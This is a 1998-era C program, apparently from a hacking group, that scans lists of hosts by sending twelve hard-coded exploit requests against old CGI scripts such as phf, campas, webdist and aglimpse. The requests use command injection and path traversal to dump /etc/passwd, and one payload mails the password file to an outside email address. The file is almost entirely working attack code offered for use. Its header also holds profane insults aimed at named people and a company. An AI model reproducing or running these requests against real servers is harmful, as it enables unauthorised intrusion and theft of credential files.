Phf - test-cgi - htmlscript - view-source - wrap - campas - pfdisplay - webdist - aglimpse - php - nph-test-cgi scanner. Linux - c source. Courtesy of soft project digital security for y2k
dfcf5bca361e966d45696564142eb1ef582869eb7125b7e08b2a334e90c89eec
/* This source is absolutely free to use and modify at you own risk, please
do not change some chars and say that this program is yours or i'll die the
next day... ;). Pay attention, this file is for research purpose only, do not
use it into any hacking way. Is possible to be logged while running the
program, so PAY ATTENTION!.
Tested on Linux RedHat 5.0 and Win95 compiled with Cygnus Gnu win32.
Many Thanks goes to s0ftpr0ject and Orda of the Badlands groups!
I want also give a big thanks to:
Goku: my linux guru
SMaster: my prezident
MaNdraKe: and his future girlfriends
Pr3dator: for his help on linux (go slower on cars!:pPp)
PhoenYx: the best italian hacker
Berk: a cool friend and a wannabe hacker
xOANON: the best cracker all around
Golem: for his bot, what about setting it on #softpj? ;)
Spaceone: a good friend
TanK_GirL: a future hacker! (i hope)
RootShell: for many source and ideas
I want also give a big fuck to:
Telecom Italia: u must die!
WarLords: Good ircwarriors but stupid people
Alexb: pay attention at your fuckin' shells
Lamers: try to be more newbies!
by |scacco|
Add-on By Dark Schneider
*/
#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>
#define MAXSTR 12
main (int argc, char *argv[])
{
struct sockaddr_in sin;
/* int outsocket, serv_len, len,c,outfd; */
/* struct hostent *nametocheck; */
/* struct in_addr outgoing; */
struct hostent *hp;
char host[100], buffer[1024], hosta[1024],FileBuf[8097];
int sock, i=0, X;
char *stringhe[MAXSTR];
for(i=0;i<MAXSTR;i++) {
stringhe[i]=(char *) malloc(sizeof(char)*100);
}
/* Classic PHF bug... It still Works! */
stringhe[0]="GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd\n";
/* test-cgi bug, possible to view documents location */
stringhe[1]="GET /cgi-bin/test-cgi?*\n";
/* htmlscript bug, a good language that can us have passwd ;) */
stringhe[2]="GET /cgi-bin/htmlscript?../../../../etc/passwd\n";
/* view-source bug, some httd use this... */
stringhe[3]="GET /cgi-bin/view-source?../../../../etc/passwd\n";
/* Wrap allow you to have a directory listing on IRIX 6.2 systems */
stringhe[4]="GET /cgi-bin/wrap?/../../../../../etc\n";
/* Campas allow you to get the passwd on NCSA server 1.2 */
stringhe[5]="GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a\n";
/* With pfdisplay & webdist is possible to get the passwd on IRIX 6.2 systems */
stringhe[6]="GET /cgi-bin/pfdisplay.cgi?/../../../../etc/passwd\n";
stringhe[7]="GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd\n";
/* With aglimpse is possible to mail the password file anywhere :) */
stringhe[8]="GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5dashie\@cyberdude.com\</etc/passwd;eval$CMD;echo\n";
/* An interesting variant for phf*/
stringhe[9]="GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20passwd\n";
stringhe[10]="GET /cgi-bin/php.cgi?/etc/passwd\n";
/* a new test-cgi but the bug is the same :) */
stringhe[11]="GET /cgi-bin/nph-test-cgi?*\n";
while(fgets(hosta,100,stdin))
{
if(hosta[0] == '\0')
break;
hosta[strlen(hosta) -1] = '\0';
write(1,hosta,strlen(hosta)*sizeof(char));
write(1,"\n",sizeof(char));
hp = gethostbyname (hosta);
for(i=0;i<MAXSTR;i++) {
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(80);
sock = socket(AF_INET, SOCK_STREAM, 0);
X=connect(sock,(struct sockaddr *) &sin, sizeof(sin));
write(sock,stringhe[i],strlen(stringhe[i])*sizeof(char));
while((X=read(sock,FileBuf,8096))!=0)
write(1,FileBuf,X);
}
}
printf("\nScacco&Dark Schneider - S0ft Pr0ject 98");
}